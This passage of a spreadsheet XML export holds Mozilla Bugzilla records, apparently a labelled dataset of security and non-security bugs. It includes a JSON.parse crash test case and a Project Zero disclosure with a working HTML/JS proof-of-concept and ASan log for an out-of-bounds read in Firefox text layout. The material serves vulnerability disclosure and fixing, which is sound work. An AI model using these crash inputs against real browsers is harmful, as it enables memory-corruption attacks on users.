          <t>mozilla35</t>
        </is>
      </c>
      <c r="T4841" t="n">
        <v>1</v>
      </c>
      <c r="U4841" t="n">
        <v>0</v>
      </c>
      <c r="V4841" t="n">
        <v>14</v>
      </c>
      <c r="W4841" t="inlineStr">
        <is>
          <t>The new object cache is partly keyed based on object address.  The computed entry index is not re-looked up after operations that can GC and cause the key to be moved, so a entry can be inserted in the wrong place.  If a subsequent lookup happens with the same class and kind but with a new key object allocated at the same address as the original key, the wrong entry will be returned.
I'm not entirely sure of the implications of this so I'm marking security sensitive.</t>
        </is>
      </c>
      <c r="X4841" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4842">
      <c r="A4842" t="n">
        <v>1506671</v>
      </c>
      <c r="B4842" t="inlineStr">
        <is>
          <t>2018-11-12 10:44:12 -0800</t>
        </is>
      </c>
      <c r="C4842" t="inlineStr">
        <is>
          <t>Convert compareChooser to React</t>
        </is>
      </c>
      <c r="D4842" t="inlineStr">
        <is>
          <t>2018-11-29 13:45:16 -0800</t>
        </is>
      </c>
      <c r="E4842" t="n">
        <v>1</v>
      </c>
      <c r="F4842" t="n">
        <v>1</v>
      </c>
      <c r="G4842" t="n">
        <v>7</v>
      </c>
      <c r="H4842" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4842" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4842" t="inlineStr">
        <is>
          <t>Perfherder</t>
        </is>
      </c>
      <c r="K4842" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4842" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4842" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4842" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4842" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4842" t="inlineStr"/>
      <c r="Q4842" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4842" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4842" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4842" t="n">
        <v>1</v>
      </c>
      <c r="U4842" t="n">
        <v>0</v>
      </c>
      <c r="V4842" t="n">
        <v>3</v>
      </c>
      <c r="W4842" t="inlineStr">
        <is>
          <t>This is for the main view in the compare tab where the user selects revisions to compare against.</t>
        </is>
      </c>
      <c r="X4842" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4843">
      <c r="A4843" t="n">
        <v>1619674</v>
      </c>
      <c r="B4843" t="inlineStr">
        <is>
          <t>2020-03-03 08:58:12 -0800</t>
        </is>
      </c>
      <c r="C4843" t="inlineStr">
        <is>
          <t>Set circleci to run tests on multiple Python versions</t>
        </is>
      </c>
      <c r="D4843" t="inlineStr">
        <is>
          <t>2020-03-09 06:53:31 -0700</t>
        </is>
      </c>
      <c r="E4843" t="n">
        <v>1</v>
      </c>
      <c r="F4843" t="n">
        <v>1</v>
      </c>
      <c r="G4843" t="n">
        <v>7</v>
      </c>
      <c r="H4843" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4843" t="inlineStr">
        <is>
          <t>Conduit</t>
        </is>
      </c>
      <c r="J4843" t="inlineStr">
        <is>
          <t>Phabricator</t>
        </is>
      </c>
      <c r="K4843" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4843" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4843" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4843" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4843" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4843" t="inlineStr"/>
      <c r="Q4843" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4843" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4843" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4843" t="n">
        <v>1</v>
      </c>
      <c r="U4843" t="n">
        <v>0</v>
      </c>
      <c r="V4843" t="n">
        <v>4</v>
      </c>
      <c r="W4843" t="inlineStr">
        <is>
          <t>Which is currently Python 3.5</t>
        </is>
      </c>
      <c r="X4843" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4844">
      <c r="A4844" t="n">
        <v>901351</v>
      </c>
      <c r="B4844" t="inlineStr">
        <is>
          <t>2013-08-04 10:13:30 -0700</t>
        </is>
      </c>
      <c r="C4844" t="inlineStr">
        <is>
          <t>Assertion failure: !obj-&gt;is&lt;ProxyObject&gt;(), at js/src/json.cpp:676</t>
        </is>
      </c>
      <c r="D4844" t="inlineStr">
        <is>
          <t>2014-07-14 05:55:13 -0700</t>
        </is>
      </c>
      <c r="E4844" t="n">
        <v>1</v>
      </c>
      <c r="F4844" t="n">
        <v>1</v>
      </c>
      <c r="G4844" t="n">
        <v>3</v>
      </c>
      <c r="H4844" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4844" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4844" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4844" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4844" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4844" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4844" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4844" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4844" t="inlineStr">
        <is>
          <t>[adv-main24+][adv-esr1709+]</t>
        </is>
      </c>
      <c r="Q4844" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4844" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4844" t="inlineStr">
        <is>
          <t>mozilla26</t>
        </is>
      </c>
      <c r="T4844" t="n">
        <v>1</v>
      </c>
      <c r="U4844" t="n">
        <v>0</v>
      </c>
      <c r="V4844" t="n">
        <v>39</v>
      </c>
      <c r="W4844" t="inlineStr">
        <is>
          <t>The following test case asserts with: !obj-&gt;is&lt;ProxyObject&gt;(), at js/src/json.cpp:676
JSON.parse('{"a":0, "b":1}', function(n, v) {
  if (n == "a") {
    Object.defineProperty(this, "b", {value: new Proxy({c:0}, {})})
  }
  return v
})</t>
        </is>
      </c>
      <c r="X4844" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4845">
      <c r="A4845" t="n">
        <v>1343552</v>
      </c>
      <c r="B4845" t="inlineStr">
        <is>
          <t>2017-03-01 07:56:49 -0800</t>
        </is>
      </c>
      <c r="C4845" t="inlineStr">
        <is>
          <t>ASAN: out-of-bounds read in gfxTextRun (after "ASSERTION: Invalid offset" and "ASSERTION: Substring out of range")</t>
        </is>
      </c>
      <c r="D4845" t="inlineStr">
        <is>
          <t>2018-07-02 02:57:25 -0700</t>
        </is>
      </c>
      <c r="E4845" t="n">
        <v>1</v>
      </c>
      <c r="F4845" t="n">
        <v>1</v>
      </c>
      <c r="G4845" t="n">
        <v>3</v>
      </c>
      <c r="H4845" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4845" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4845" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K4845" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4845" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4845" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4845" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4845" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4845" t="inlineStr">
        <is>
          <t>[adv-main53+][adv-esr52.1+][adv-esr45.9+]</t>
        </is>
      </c>
      <c r="Q4845" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4845" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4845" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T4845" t="n">
        <v>1</v>
      </c>
      <c r="U4845" t="n">
        <v>0</v>
      </c>
      <c r="V4845" t="n">
        <v>40</v>
      </c>
      <c r="W4845" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Steps to reproduce:
There is an out-of-bounds read vulnerability in Firefox. The vulnerability was confirmed on the nightly ASan build. 
Please note: This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
With any fix, please give credit for identifying the vulnerability to Ivan Fratric of Google Project Zero.
PoC:
=================================================================
&lt;style&gt;
.class1 { float: left; white-space: pre-line; }
.class2 { border-bottom-style: solid; font-face: Arial; font-size: 7ex; }
&lt;/style&gt;
&lt;script&gt;
function go() {
  menuitem.appendChild(document.body.firstChild);
  canvas.toBlob(callback);
}
function callback() {
  var s = menu.style;
  s.setProperty("flex-direction", "row-reverse");
  option.scrollBy();
  document.implementation.createHTMLDocument("foo").adoptNode(progress);
  s.setProperty("flex-direction", "column");
  canvas.toBlob(callback);
}
&lt;/script&gt;
aaaaaaaaaaaaaaaaaa
&lt;/head&gt;
&lt;body onload=go()&gt;
&lt;del class="class1"&gt;
&lt;span class="class2"&gt;
&lt;menu id="menu"&gt;
&lt;menuitem&gt;
&lt;/menu&gt;
&lt;menuitem id="menuitem"&gt;
&lt;progress id="progress"&gt;
&lt;/del&gt;
&lt;ol dir="rtl"&gt;l+0&lt;/ol&gt;
&lt;canvas id="canvas"&gt;
&lt;option id="option"&gt;
=================================================================
ASan log:
=================================================================
==104545==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000721ecc at pc 0x7fcef25af0e8 bp 0x7ffc23afd1b0 sp 0x7ffc23afd1a8
READ of size 4 at 0x611000721ecc thread T0
    #0 0x7fcef25af0e7 in IsSimpleGlyph /home/worker/workspace/build/src/gfx/thebes/gfxFont.h:785:46
    #1 0x7fcef25af0e7 in GetAdvanceForGlyph /home/worker/workspace/build/src/gfx/thebes/gfxTextRun.h:638
    #2 0x7fcef25af0e7 in GetAdvanceForGlyphs /home/worker/workspace/build/src/gfx/thebes/gfxTextRun.cpp:334
    #3 0x7fcef25af0e7 in gfxTextRun::GetAdvanceWidth(gfxTextRun::Range, gfxTextRun::PropertyProvider*, gfxFont::Spacing*) const /home/worker/workspace/build/src/gfx/thebes/gfxTextRun.cpp:1074
    #4 0x7fcef704ac7c in nsTextFrame::TrimTrailingWhiteSpace(mozilla::gfx::DrawTarget*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:9654:15
    #5 0x7fcef6d2a2ef in nsLineLayout::TrimTrailingWhiteSpaceIn(nsLineLayout::PerSpanData*, int*) /home/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:2584:44
    #6 0x7fcef6d2a1c7 in nsLineLayout::TrimTrailingWhiteSpaceIn(nsLineLayout::PerSpanData*, int*) /home/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:2531:11
    #7 0x7fcef6d2a1c7 in nsLineLayout::TrimTrailingWhiteSpaceIn(nsLineLayout::PerSpanData*, int*) /home/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:2531:11
    #8 0x7fcef6d2b293 in nsLineLayout::TrimTrailingWhiteSpace() /home/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:2654:3
    #9 0x7fcef6dcc03b in nsBlockFrame::PlaceLine(mozilla::BlockReflowInput&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFloatManager::SavedState*, mozilla::LogicalRect&amp;, int&amp;, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4479:3
    #10 0x7fcef6dcabe3 in nsBlockFrame::DoReflowInlineFrames(mozilla::BlockReflowInput&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFlowAreaRect&amp;, int&amp;, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4082:12
    #11 0x7fcef6dc0d6c in nsBlockFrame::ReflowInlineFrames(mozilla::BlockReflowInput&amp;, nsLineList_iterator, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3828:9
    #12 0x7fcef6dafacf in ReflowLine /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2834:5
    #13 0x7fcef6dafacf in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&amp;) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2370
    #14 0x7fcef6da5c1a in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1237:3
    #15 0x7fcef6dc6e8d in nsBlockReflowContext::ReflowBlock(mozilla::LogicalRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, mozilla::ReflowInput&amp;, nsReflowStatus&amp;, mozilla::BlockReflowInput&amp;) /home/worker/workspace/build/src/layout/generic/nsBlockReflowContext.cpp:306:3
    #16 0x7fcef6dd9001 in nsBlockFrame::ReflowFloat(mozilla::BlockReflowInput&amp;, mozilla::LogicalRect const&amp;, nsIFrame*, mozilla::LogicalMargin&amp;, mozilla::LogicalMargin&amp;, bool, nsReflowStatus&amp;) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:6272:5
    #17 0x7fcef6d4d19f in mozilla::BlockReflowInput::FlowAndPlaceFloat(nsIFrame*) /home/worker/workspace/build/src/layout/generic/BlockReflowInput.cpp:910:5
    #18 0x7fcef6d4b143 in mozilla::BlockReflowInput::AddFloat(nsLineLayout*, nsIFrame*, int) /home/worker/workspace/build/src/layout/generic/BlockReflowInput.cpp:627:14
    #19 0x7fcef6d21369 in AddFloat /home/worker/workspace/build/src/layout/generic/nsLineLayout.h:190:12
    #20 0x7fcef6d21369 in nsLineLayout::ReflowFrame(nsIFrame*, nsReflowStatus&amp;, mozilla::ReflowOutput*, bool&amp;) /home/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:979
    #21 0x7fcef6dcb7bb in nsBlockFrame::ReflowInlineFrame(mozilla::BlockReflowInput&amp;, nsLineLayout&amp;, nsLineList_iterator, nsIFrame*, LineReflowStatus*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4153:3
    #22 0x7fcef6dca446 in nsBlockFrame::DoReflowInlineFrames(mozilla::BlockReflowInput&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFlowAreaRect&amp;, int&amp;, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3954:5
    #23 0x7fcef6dc0d6c in nsBlockFrame::ReflowInlineFrames(mozilla::BlockReflowInput&amp;, nsLineList_iterator, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3828:9
    #24 0x7fcef6dafacf in ReflowLine /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2834:5
    #25 0x7fcef6dafacf in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&amp;) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2370
    #26 0x7fcef6da5c1a in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1237:3
    #27 0x7fcef6dc6e8d in nsBlockReflowContext::ReflowBlock(mozilla::LogicalRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, mozilla::ReflowInput&amp;, nsReflowStatus&amp;, mozilla::BlockReflowInput&amp;) /home/worker/workspace/build/src/layout/generic/nsBlockReflowContext.cpp:306:3
    #28 0x7fcef6dbc4da in nsBlockFrame::ReflowBlockFrame(mozilla::BlockReflowInput&amp;, nsLineList_iterator, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3462:7
    #29 0x7fcef6dafafa in ReflowLine /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2831:5
    #30 0x7fcef6dafafa in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&amp;) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2370
    #31 0x7fcef6da5c1a in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1237:3
    #32 0x7fcef6e0ada0 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, mozilla::WritingMode const&amp;, mozilla::LogicalPoint const&amp;, nsSize const&amp;, unsigned int, nsReflowStatus&amp;, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1028:3
    #33 0x7fcef6e09555 in nsCanvasFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;) /home/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:711:5
    #34 0x7fcef6e0ada0 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, mozilla::WritingMode const&amp;, mozilla::LogicalPoint const&amp;, nsSize const&amp;, unsigned int, nsReflowStatus&amp;, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1028:3
    #35 0x7fcef6eb0394 in nsHTMLScrollFrame::ReflowScrolledFrame(mozilla::ScrollReflowInput*, bool, bool, mozilla::ReflowOutput*, bool) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:552:3
    #36 0x7fcef6eb1840 in nsHTMLScrollFrame::ReflowContents(mozilla::ScrollReflowInput*, mozilla::ReflowOutput const&amp;) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:664:3
    #37 0x7fcef6eb5073 in nsHTMLScrollFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:1039:3
    #38 0x7fcef6e1b964 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, int, int, unsigned int, nsReflowStatus&amp;, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1072:3
    #39 0x7fcef6d8b760 in mozilla::ViewportFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, nsReflowStatus&amp;) /home/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:326:7
    #40 0x7fcef6b89187 in mozilla::PresShell::DoReflow(nsIFrame*, bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9202:3
    #41 0x7fcef6b9cde4 in mozilla::PresShell::ProcessReflowCommands(bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9375:24
    #42 0x7fcef6b9bcf6 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4174:11
    #43 0x7fcef2c4646e in FlushPendingNotifications /home/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:598:5
    #44 0x7fcef2c4646e in nsDocument::FlushPendingNotifications(mozilla::FlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:7961
    #45 0x7fcef2a1f2b4 in GetPrimaryFrame /home/worker/workspace/build/src/dom/base/Element.cpp:2164:5
    #46 0x7fcef2a1f2b4 in mozilla::dom::Element::GetScrollFrame(nsIFrame**, bool) /home/worker/workspace/build/src/dom/base/Element.cpp:637
    #47 0x7fcef2a20871 in mozilla::dom::Element::ScrollBy(mozilla::dom::ScrollToOptions const&amp;) /home/worker/workspace/build/src/dom/base/Element.cpp:794:28
    #48 0x7fcef4112002 in mozilla::dom::ElementBinding::scrollBy(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::Element*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:2492:7
    #49 0x7fcef45cdd27 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2953:13
    #50 0x7fcefa0cc04f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #51 0x7fcefa0cc04f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #52 0x7fcefa0b2970 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
    #53 0x7fcefa0b2970 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2955
    #54 0x7fcefa097c9b in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #55 0x7fcefa0cc366 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #56 0x7fcefa0cca42 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #57 0x7fcefaa9cd1c in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2878:12
    #58 0x7fcef4242c05 in mozilla::dom::BlobCallback::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Blob*, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLCanvasElementBinding.cpp:81:8
    #59 0x7fcef475613f in Call /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/HTMLCanvasElementBinding.h:180:12
    #60 0x7fcef475613f in mozilla::dom::CanvasRenderingContextHelper::ToBlob(JSContext*, nsIGlobalObject*, mozilla::dom::BlobCallback&amp;, nsAString_internal const&amp;, JS::Handle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;)::EncodeCallback::ReceiveBlob(already_AddRefed&lt;mozilla::dom::Blob&gt;) /home/worker/workspace/build/src/dom/canvas/CanvasRenderingContextHelper.cpp:56
    #61 0x7fcef2acde86 in mozilla::dom::EncodingCompleteEvent::Run() /home/worker/workspace/build/src/dom/base/ImageEncoder.cpp:105:12
    #62 0x7fcef0217012 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
    #63 0x7fcef02138c0 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #64 0x7fcef10322bf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #65 0x7fcef0fa3658 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #66 0x7fcef0fa3658 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #67 0x7fcef0fa3658 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #68 0x7fcef63ffdbf in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #69 0x7fcef9a88d81 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
    #70 0x7fcef9c5243c in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4476:10
    #71 0x7fcef9c53f38 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4654:8
    #72 0x7fcef9c551fc in XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4745:16
    #73 0x4dffaf in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:237:10
    #74 0x4dffaf in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:308
    #75 0x7fcf0b63282f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #76 0x41c3d8 in _start (/home/ifratric/p0/latest/firefox/firefox+0x41c3d8)
0x611000721ecc is located 0 bytes to the right of 204-byte region [0x611000721e00,0x611000721ecc)
allocated by thread T0 here:
    #0 0x4b2e4b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x7fcef25b9900 in AllocateStorageForTextRun /home/worker/workspace/build/src/gfx/thebes/gfxTextRun.cpp:122:21
    #2 0x7fcef25b9900 in Create /home/worker/workspace/build/src/gfx/thebes/gfxTextRun.cpp:139
    #3 0x7fcef25b9900 in gfxFontGroup::MakeTextRun(unsigned char const*, unsigned int, gfxTextRunFactory::Parameters const*, unsigned int, gfxMissingFontRecorder*) /home/worker/workspace/build/src/gfx/thebes/gfxTextRun.cpp:2075
    #4 0x7fcef6ff6f49 in BuildTextRunsScanner::BuildTextRunForFrames(void*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:2394:17
    #5 0x7fcef6fefe0b in BuildTextRunsScanner::FlushFrames(bool, bool) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1633:17
    #6 0x7fcef6ffb09d in BuildTextRunsScanner::ScanFrame(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1902:9
    #7 0x7fcef6ffb72f in BuildTextRunsScanner::ScanFrame(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1942:5
    #8 0x7fcef6ffb72f in BuildTextRunsScanner::ScanFrame(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1942:5
    #9 0x7fcef7003a8a in BuildTextRuns /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1534:7
    #10 0x7fcef7003a8a in nsTextFrame::EnsureTextRun(nsTextFrame::TextRunType, mozilla::gfx::DrawTarget*, nsIFrame*, nsLineList_iterator const*, unsigned int*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:2860
    #11 0x7fcef703d429 in nsTextFrame::AddInlineMinISizeForFlow(nsRenderingContext*, nsIFrame::InlineMinISizeData*, nsTextFrame::TextRunType) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:8329:5
    #12 0x7fcef70405ef in nsTextFrame::AddInlineMinISize(nsRenderingContext*, nsIFrame::InlineMinISizeData*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:8499:7
    #13 0x7fcef6e1a982 in nsContainerFrame::DoInlineIntrinsicISize(nsRenderingContext*, nsIFrame::InlineIntrinsicISizeData*, nsLayoutUtils::IntrinsicISizeType) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:897:9
    #14 0x7fcef6e1a982 in nsContainerFrame::DoInlineIntrinsicISize(nsRenderingContext*, nsIFrame::InlineIntrinsicISizeData*, nsLayoutUtils::IntrinsicISizeType) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:897:9
    #15 0x7fcef6d9f622 in nsBlockFrame::GetMinISize(nsRenderingContext*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:774:11
    #16 0x7fcef6e1b150 in ShrinkWidthToFit /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:5566:22
    #17 0x7fcef6e1b150 in nsContainerFrame::ComputeAutoSize(nsRenderingContext*, mozilla::WritingMode, mozilla::LogicalSize const&amp;, int, mozilla::LogicalSize const&amp;, mozilla::LogicalSize const&amp;, mozilla::LogicalSize const&amp;, nsIFrame::ComputeSizeFlags) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:942
    #18 0x7fcef6e2260e in nsFrame::ComputeSize(nsRenderingContext*, mozilla::WritingMode, mozilla::LogicalSize const&amp;, int, mozilla::LogicalSize const&amp;, mozilla::LogicalSize const&amp;, mozilla::LogicalSize const&amp;, nsIFrame::ComputeSizeFlags) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:4822:24
    #19 0x7fcef6d4fb36 in FloatMarginISize(mozilla::ReflowInput const&amp;, int, nsIFrame*, mozilla::SizeComputationInput const&amp;) /home/worker/workspace/build/src/layout/generic/BlockReflowInput.cpp:692:5
